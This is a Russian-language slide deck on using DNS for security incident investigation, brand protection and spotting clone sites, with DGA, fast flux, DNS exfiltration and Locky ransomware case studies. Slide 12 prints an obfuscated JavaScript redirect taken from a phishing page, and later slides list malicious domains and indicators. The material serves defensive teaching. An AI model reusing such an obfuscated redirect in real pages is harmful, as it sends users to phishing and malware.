Документ обсуждает использование DNS в расследовании инцидентов кибербезопасности, включая защиту брендов и обнаружение сайтов-клонов. Обсуждаются методы применения DNS для отслеживания вредоносной активности и анализирования аномалий, связанных с доменными именами и IP-адресами. Также рассматриваются примеры инцидентов, связанных с DGA и злоумышленниками, использующими техники, такие как редиректы и фишинг.

1. Алексей Лукацкий
1 ноября 2017
DNS как улика
Применение DNS для расследования
инцидентов, защиты бренда и поиска сайтов
клонов

2. Филиал
HQ
Аэропорт

3. Productivity

4. Productivity File share

5. Productivity File share
CRM

6. Запрет Allow access
Productivity File share
ПриложенияCRM
Разрешить

8. Пользователи и приложения переходят в облака
49%
рабочих мест
мобильны
82%
подключений не
используют
VPN
70%
роста в
использовании
SaaS
70%
филиалов
имеют прямой
доступ в
Интернет
Контроль ИБ
сдвигается в
облака
ИБ должна тоже

9. Вредоносный код
и шифровальщики
Редиректы, DGA и
Fast Flux
Сайты-клоны и
типосквоттинг
Утечки
информации
В чем проблема?

10. • Фишинговая ссылка:
http://www.linkedin.com/do?action=viewMessage&q=member&id=46258219
• Реальная ссылка:
http://dixontax.com/wp-content/angle.php
Что происходит в реальной жизни?

11. Что мы знаем про dixontax.com?

12. <html><head><meta name="keywords" content="circles, suspended, history,
phrases"><title>plotted32135 Will - him - human renderd, hell - grizzly feeding.
coming.</title><meta http-equiv="Content-Type" content="text/html; charset=ISO-
8859-1"></head>
<body>
<script type="text/javascript">function nexte() { nexta=65;
nextb=[184,170,175,165,176,184,111,181,176,177,111,173,176,164,162,181,170,1
76,175,111,169,179,166,167,126,104,169,181,181,177,123,112,112,163,179,162,1
70,175,180,185,169,176,177,180,111,164,176,174,112,128,162,126,117,113,114,11
6,116,119,103,164,126,164,177,164,103,180,126,113,118,113,115,114,120,104,124
];
nextc=""; for(nextd=0;nextd<nextb.length;nextd++) {
nextc+=String.fromCharCode(nextb[nextd]-nexta); } return nextc; }
setTimeout(nexte(),1299);
</script>
</body>
</html>
Что по ссылке?

13. • window.top.location.href='http://brainsxhops.com/?a=401336&c=cpc&s=0
50217';
• Изначально было: http://dixontax.com/wp-content/angle.php
Что получится при запуске функции?

14. А что известно про brainsxhops.com?

15. Сеть посредников ZBot Fast Flux

16. Найдите разницу
• Клонирование сайта
осуществляется за минуты
• Клон размещается на
заранее купленном домене и
крадет информацию
(логины/пароли)
• В клон можно внедрять
вредоносный код для
заражения пользователей

17. А тут можете найти разницу?
• Возможность использования разных кодировок,
невнимательность пользователей и ошибки при наборе с
клавиатуры

18. Утечка через DNS (через имя поддомена)
Нормальное распределение длин поддоменов Аномалии в названии поддоменов
log.nu6timjqgq4dimbuhe.3ikfsb---отредактировано---cg3.7s3bnxqmavqy7sec.dojfgj.com
log.nu6timjqgq4dimbuhe.otlz5y---отредактировано---ivc.v55pgwcschs3cbee.dojfgj.com
Что скрывается в этой строке на 231 символ?

19. Утечка через DNS (через запись TXT)

20. Определение DGA
2017-10-28T00:02:45
2017-10-28T00:02:47
2017-10-28T00:02:52
…………
PDGA=0 PDGA=0 PDGA=0.98
Длина
Энтропия
N-grams
Словарь
Longest Const
Longest Vowels
…
chaseonline.amer.gslbjpmchase.com WHOIS
chaseonline.amer.gslbjpmchase.com
PMalicious=.38
PMalicious=.01 ЧИСТЫЙ
Time
Series
Analysis
Network
Features
Classifier
[chaseonline].[amer].[gslbjpmchase].[com][chaseonline].[amer].[gslbjpmchase].[com]
SLD3LD4LD TLD
DGA
Classifier
chaseonline.amer.gslbjpmchase.com

21. Домен Вероятность
pdxxwkfttogrib[.]in 0.985
jpqrhoctgihell[.]tw 0.985
jtmvtchedyscmn[.]me 0.985
krpbtonwsrhcig[.]su 0.985
xoeluhhsnlosqo[.]me 0.98
dkblkeftpeodxk[.]me 0.98
iqivnmecsnyvbu[.]me 0.98
rndruppbakyokv[.]com 0.98
gdbvlvedrjunwn[.]me 0.975
dsbyhplmesbqgh[.]me 0.975
njcdcqdwcsrhoc[.]me 0.975
mvugkafkrelpsa[.]tw 0.975
veqalsexqhkrrg[.]su 0.975
jjhsmiubxxqvbl[.]me 0.975
dbqhfffdjdvrmn[.]me 0.975
gsiyrhxqljweuh[.]me 0.975
nbbnwnesmxkbmv[.]me 0.975
Зараженные
устройства
Чистые
домены
Вредоносные
домены
Результаты анализа DGA

22. Визуализация DGA для трояна Tinba

23. • Rovnix использует текст из
американской декларации
независимости как вход для
DGA:
• Kingwhichtotallyadminis[.]biz
• thareplunjudiciary[.]net
• townsunalienable[.]net
• taxeslawsmockhigh[.]net
• transientperfidythe[.]biz
• inhabitantslaindourmock[.]cn
• thworldthesuffer[.]biz
• Matsnu использует для DGA
существительные и глаголы из
словаря на 1300 слов для
формирования 20+ символьных фраз:
• monthboneplatereferencebreast[.]com
• accidentassistriskchallenge[.]com
• fieldcowtowelstorerecommend[.]com
• productpageprofilereactside[.]com
• pollutionboarddeallandmarch[.]com
• seasonbathrentinfluencebeing[.]com
Злоумышленники не стоят на месте

24. Следуй за «Плохим кроликом»

25. ЖЕСТКО
НАСТРОЕННЫЙ IP
@23.4.24.1
БЫСТРАЯ СМЕНА
“FAST FLUX”
@23.4.24.1
bad.com?
@34.4.2.110
@23.4.34.55
@44.6.11.8
@129.3.6.3
АЛГОРИТМ ГЕНЕРАЦИИ
ДОМЕНОВ (DGA)
bad.com?
@34.4.2.11
0
baa.ru?
bid.cn
@8.2.130.3
@12.3.2.1
@67.44.21.1
Эволюция управления вредоносным кодом

26. 70-90%
вредоносного кода
уникально – AV не
спасает
DNS нельзя
запретить на МСЭ,
а 49%
пользователей
работают за
пределами МСЭ
Сканеры
уязвимостей ищут
дыры, а DNS-ВПО
использует
стандартные
функции
VPN частично
решает проблему,
но 69% филиалов
подключается
напрямую
А что с традиционной защитой?

27. Zbot
ZeroAccess
njRAT
Regi
n
Gh0st
Storm
Pushdo/Cutwail DarkComet
Bifrose
Lethic
Kelihos
Gameover Zeus
CitadelTinba
Hesperbot
Bouncer (APT1)
Glooxmail
(APT1)
Longrun (APT1)
Seasalt
(APT1)
Starsypound (APT1)
Biscuit (APT1)PoisonIvy
Tinba
НЕ-WEB C2 ПРИМЕРЫ
DNS
WEBНЕ-WEB
IP IP
миллионы
уникальных
семплов ВПО из
ЛВС за последние 2
года
Lancope Research
(сейчас Cisco)1
15%C2 не использует
Web-порты 80 & 443
миллионы
уникальных семплов
ВПО загружены в
песочницу за
последние 6 месяцев
Cisco AMP Threat
Grid Research2
91%C2 может быть
блокировано на DNS
уровне
Почему традиционные решения не спасают?

28. DNS = Domain Name System
• Первый шаг в подключении к
Интернет
• Используется на всех устройствах
• Не зависит от порта
Быстрый взгляд на DNS
Umbrella
cisco.com 72.163.4.161

29. Мониторинг DNS
Защищает доступ к Интернет везде
Вредонос
C2-соединения
Фишинг
HQ
Sandbox
NGFW
Proxy
Netflow
AV AV
ФИЛИАЛ
Router/UTM
AV AV
ROAMING
AV
Первая
линия
Все это начинается
с DNS
DNS используется всеми
устройствами
Защита от вредоносов,
фишинга и общения с C2
Получение контроля над
всеми устройствами и
пользователями в
Интернет

30. Данные записей WHOIS
Атрибуция ASN
Геолокация IP
Репутация доменов и IP
Анализ вредоносных файлов
Связи между доменами
Обнаружение аномалий (DGA, FFN)
Шаблоны запросов DNS
База пассивного DNS
Что нужно для расследования?

31. Записи WHOIS
• Контактные данные
владельца домена
• Корреляция с другой
вредоносной
активностью
Чем помогает DNS при расследовании?

32. Связи
• Другие домены
запрашиваются сразу
до или после
• Другие домены,
связанные с атакой
Чем помогает DNS при расследовании?
Записи WHOIS
• Контактные данные
владельца домена
• Корреляция с другой
вредоносной
активностью

33. IP & ASN
• Хостинговая
инфраструктура
домена
• Анализ
инфраструктуры хакера
Чем помогает DNS при расследовании?
Связи
• Другие домены
запрашиваются сразу
до или после
• Другие домены,
связанные с атакой
Записи WHOIS
• Контактные данные
владельца домена
• Корреляция с другой
вредоносной
активностью

34. 216.35.221.76:43173.236.173.144157.166.226.25
То, что вы
видите
сегодня
malware.exeperviyclass.su
perviylich.ruStatecollegenow.com
AS 3561AS 5662
bobnpr.comwww.cnn.com igloofire.com
216.35.221.76:43173.236.173.144157.166.226.25
Что если бы
вы видели
это?

35. • Через вложение Email в
фишинговой рассылке
• Шифрует и
переименовывает файлы
с .locky расширением
• Примерно 90,000 жертв в
день
• Выкуп порядка 0.5 – 1.0
BTC (1 BTC ~ $601 US)
• Связан с операторами
Dridex
Чувствуете Locky?

36. Locky: обнаружение инфраструктуры
злоумышленника
СЕНТЯБРЬ 12-26 ДНЕЙ
DNS
АВГУСТ 17
LOCKY
*.7asel7[.]top
?
Domain → IP
Ассоциация
?
IP → Sample
Ассоциация
?
IP → Network
Ассоциация
?
IP → Domain
Ассоциация
?
WHOIS
Ассоциация
?
Network → IP
Ассоциация

37. 91.223.89.201185.101.218.206
600+
Threat Grid files
SHA256:0c9c328eb66672e
f1b84475258b4999d6df008
*.7asel7[.]top LOCKY
Domain → IP
Ассоциация
AS 197569IP → Network
Ассоциация
1,000+
DGA domains
ccerberhhyed5frqa[.]8211fr[.]top
IP → Domain
Ассоциация
IP → Sample
Ассоциация
CERBER

38. -26 DAYS AUG 21
DNS
JUL 18
JUL 21
DNS
JUL 14
jbrktqnxklmuf[.]info
mhrbuvcvhjakbisd[.]xyz
LOCKY
LOCKY
DGA
Network → Domain
Ассоциация
DGA
Угроза обнаружена в
день регистрации домена
Угроза обнаружена до
регистрации домена.
ДОМЕН
ЗАРЕГИСТРИРОВАН
JUL 22

39. Блокировка Locky: пример домена
taddboxers.com (Дата обнаружения: Октябрь 8, 2016)

40. Фальшивые домены Microsoft

41. Фальшивые домены Сбербанка

42. Сайты фейковых новостей

43. Сайты фейковых новостей

44. Сайты фейковых новостей

45. Сайты фейковых новостей

46. Сайты фейковых новостей

47. Сайты фейковых новостей

48. Сайты фейковых новостей
Скрытие адреса владельца домена - плохой знак, но это еще все-таки
не криминал

49. Сайты фейковых новостей

50. Сайты фейковых новостей

51. Сайты фейковых новостей

52. Первая линия защиты против Интернет-угроз
DNS
Видеть
Видеть все для
защиты везде
Предсказывать
Видеть атаки до того, как
они будут запущены
Блокировать
Остановить угрозы до
того, как начнется атака

53. alukatsk@cisco.com